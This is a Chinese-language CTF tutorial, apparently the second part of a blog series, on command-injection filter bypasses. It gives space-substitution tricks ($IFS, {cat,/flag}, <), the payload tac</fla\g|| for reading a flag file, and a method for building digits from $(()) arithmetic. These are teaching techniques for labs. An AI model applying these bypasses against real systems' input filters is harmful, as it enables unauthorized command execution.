25分钟了解命令执行漏洞【例题+详细讲解】(二)

简介: >1继续了解如何绕过过滤>2学会构造数字

@TOC

🍀预计时间:25分钟
学习目标:
1继续了解如何绕过过滤
2学会构造数字
⚠别看今天目标少,内容需要思考滴!!!
在这里插入图片描述

过滤cat,flag,空格,数字,$

承接上文,我们介绍了如何绕过过滤cat,flag等,可是如果同时过滤了空格和$我们该怎么办呢???
在这里插入图片描述

明显,$IFS我们用不了了,所以这里再介绍几个绕过空格的方法:
==$IFS==
==$IFS$1==
==${IFS}==
=={,}:例如{cat,/flag}==
==<==
==<>==

这道题我们使用<来作答
在这里插入图片描述
传参tac</fla\g||就可以得到flag了!!!

构造数字(这个比较难搞,所以重点介绍下)

==在linux shell中 $(()) 用来计算数学表达式==
例如:
echo $(()) 0
echo $((~$(()))) -1
echo $((~$(())))$((~$(())))$((~$(()))) -1-1-1
echo $((~$(($((~$(())))$((~$(())))$((~$(()))))))) 2
echo $(($((~$(())))$((~$(())))$((~$(()))))) -3
有没有发现规律???
很明显,如果括号内不加表达式就是0,取反就是-1,我们可以把它们拼接在一起(-1-1-1),也可以加在一起(-3)

在这里插入图片描述

🏆🏆结束语:
==命令执行漏洞的内容会不定期更新,如果对您有帮助的话可以订阅一下专栏==

相关文章
|
1月前
|
SQL 安全 Linux
命令执行漏洞
命令执行漏洞
|
3月前
|
Web App开发 安全 云计算
H3C任意命令执行漏洞
H3C任意命令执行漏洞
46 1
|
移动开发 监控 安全
|
存储 编解码 安全
|
安全 开发工具
25分钟了解命令执行漏洞【例题+详细讲解】(一)
&gt;🎉1理解原理 &gt;🎉2学会思路 &gt;🎉3了解过滤cat,flag,空格的处理方式
183 0
25分钟了解命令执行漏洞【例题+详细讲解】(一)
|
Shell
shell脚本——八个循环实验(使用while循环)(上)
实验一 实验要求:计算从1到100所有整数的和。 创建脚本:
199 0
|
Shell 数据安全/隐私保护
shell脚本——八个循环实验(使用while循环)(下)
实验一 实验要求:计算从1到100所有整数的和。 创建脚本:
152 0
|
Shell 数据安全/隐私保护
shell脚本——八个循环实验(使用for循环)(下)
实验一 实验要求:计算从1到100所有整数的和。 创建脚本并执行:
231 0
|
Shell 数据安全/隐私保护
shell脚本——八个循环实验(使用for循环)(上)
实验一 实验要求:计算从1到100所有整数的和。 创建脚本并执行:
117 0
|
安全 Linux 开发工具
总结,复习,整合命令执行漏洞实现及其绕过(绕过方式大全)
&gt;🍀1复习一下以前的内容 &gt;🍀2总结整合一下过滤方法
246 0
总结,复习,整合命令执行漏洞实现及其绕过(绕过方式大全)